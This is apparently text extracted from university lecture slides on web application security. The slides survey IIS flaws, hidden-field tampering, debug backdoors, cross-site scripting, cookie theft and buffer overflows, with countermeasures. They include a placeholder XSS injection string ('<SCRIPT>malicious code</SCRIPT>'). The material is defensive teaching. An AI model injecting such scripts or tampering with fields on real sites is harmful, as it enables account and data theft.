Transcript Web-applications security

Security of Web
Applications
Jamshid Shokrollahi
E-Commerce Security
Overview
 Why Web application security?
 Some attacks on web applications
and corresponding countermeasures
Why Web application
security?





Reduce cost of recovery and fixes
Ensure customer trust
Encourage website adoption
Maintain competitive advantages
Manage legal risks
Some attacks on Web
Applications
 Known vulnerabilities and
misconfigurations
 Hidden fields
 Backdoor and debug options
 Cross-site scripting
 Cookie poisoning
 Buffer overflow
Known vulnerabilities and
misconfigurations
Security Bulletin MS00-078:
… in IIS 4.0 and 5.0, a particular type of malformed URL …
enables a malicious user ... to add, change or delete data, run
code already on the server, or upload new code to the server and
run it. …
 October 2000: Microsoft’s IIS
 A malformed URL lets the malicious user to navigate
in the logical drive of the web server.
 Runs under the security context of the
IUSR_machinename which is anonymous account for
the IIS and belongs to the everyone and guests
account.
Tampering Hidden fields
 Hidden fields in forms could contain
passwords or prices which must be
submitted back to the server.
 They can be viewed or modified by
clients and submitted back.
Tampering Hidden fields
The forms
should be
Web server
validated
Form to be filled by
containing
andorders
prices as hidden
fields
passwords
should not
be sent to
the clients.
Web user
Wrong order
Unit prices (hidden
fields) are reduced.
Database
server
Backdoor and debug
options
 Backdoor options are built into
applications during debugging.
 Programmers build shortcuts to avoid
logging in for every round of
debugging.
 Because of time limits debugging
versions are put on the web.
Threats caused by scripts
 CERT Advisory CA-1997-20
 Impact: Enables monitoring web activities
 Cause: Vulnerabilities in browsers (javascript)
 Solution: upgrade browser or disable javascript
 CERT Vulnerability Note VU#800893



Impact: Disclosing files
Cause: Vulnerability in the implementation of GetObject in
IE (VBscript)
Solution: download patch or disable active scripting in IE
especially when visiting untrusted sites.
Cross-site scripting
 Hope browsers are not patched
 Put malicious codes on innocent webpages
 Submit texts including:
<SCRIPT>malicious code</SCRIPT>
Others download the code
 Abuse of <FORM> tag
 Internet Explorer security "zones" can
be subverted by this technique
Cookie-based attacks
 Like hidden field attack when
parameters are saved in cookies.
 Packet-sniffing for to still identities
which are saved in cookies
 Using digital signatures and
cryptography
 Using CSS to send cookies to other
servers, even cryptography does not
help
Buffer overflow
 Some kind of denial of service attacks
 Malicious users can sometimes run
their own program
 Overwriting stack with the address of
their programs
Bibliography
 Gunter Ollmann, HTML Code Injection and Cross-site
scripting, http://www.technicalinfo.net/papers/CSS.html
 CERT Advisory CA-2000-02, Malicious HTML Tags
Embedded in Client Web Requests,
http://www.cert.org/advisories/CA-2000-02.html
 Wikipedia